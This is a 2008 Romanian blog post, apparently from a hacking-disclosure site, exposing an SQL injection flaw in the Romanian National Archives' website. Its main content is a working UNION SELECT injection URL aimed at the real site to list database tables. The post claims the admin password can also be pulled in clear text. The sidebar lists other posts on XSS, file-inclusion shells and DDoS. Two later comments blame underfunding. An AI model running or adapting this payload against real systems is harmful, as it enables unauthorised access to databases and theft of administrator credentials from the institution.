United
- Yahoo! again - XSS in Uncategorized (357 Visits)
- Yahoo! again - bad settings? in Uncategorized (252 Visits)
- Fanii nostri in Uncategorized (183 Visits)
- Frustrant in Uncategorized (146 Visits)
- La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
- Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
- Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
- ... in Uncategorized (38 Visits)
- XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
- Ce servicii de mail folositi? in (121 Visits)
- Azi este ziua userilor hackersblog.org in (120 Visits)
- De reţinut in (117 Visits)
- Inca o pierdere de timp in (107 Visits)
- De tinut minte in (106 Visits)
- Twitter in (78 Visits)
- Un nou membru in (74 Visits)
- Interviu la Radio Lynx in (70 Visits)
- 2009 in (51 Visits)
- Editori noi. in (35 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (199 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (139 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (104 Visits)
- ioana (2)
- pax (1)
- TotEu23 (1)
- viorel (1)
- Cristi - Jurnalul National (1)
- alex (1)
- Bogdan (1)
- ghici (1)
- Nimeni Altul (1)
- Vice (1)
Posted on November 27th, 2008
“Arhivele Nationale ale Romaniei, institutie cu o istorie de 177 de ani, aflata in subordinea Ministerului Internelor si Reformei Administrative, are atributii in administrarea si protectia speciala a Fondului Arhivistic National al Romanie”..citez de pe site. Speram totusi ca de acel fond este administrat mai bine si este mai protejat decat propria pagina web a distinsei institutii, care are o grava vulnerabilitate la sql injection. Link catre tabele:
http://www.arhivelenationale.ro/index.php?lan=0&jud=1234999%20union%20all%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables/*
Chiar si parola pentru contul de admin al site-ului este extractibil in text clar. Plus este o parola simpla,usor de ghicit, nepermis pentru un site serios.
</a
October 2nd, 2009 at 5:25 pm
Informatii suplimentare. Saitul ANR a fost facut din putinii bani de investitii ai institutiei pentru ca MAI-ul nu da bani pentru accestul cetatenilor la “secretele” din Arhivele Nationale…Asa ca nu ma mira ca situl sta prost la securitate…
October 2nd, 2009 at 5:28 pm
Cu acest sit s-a incercat imbunatatirea imaginii institutiei insa adevarata iformatizare a ANR nu e nici macar pe hartie…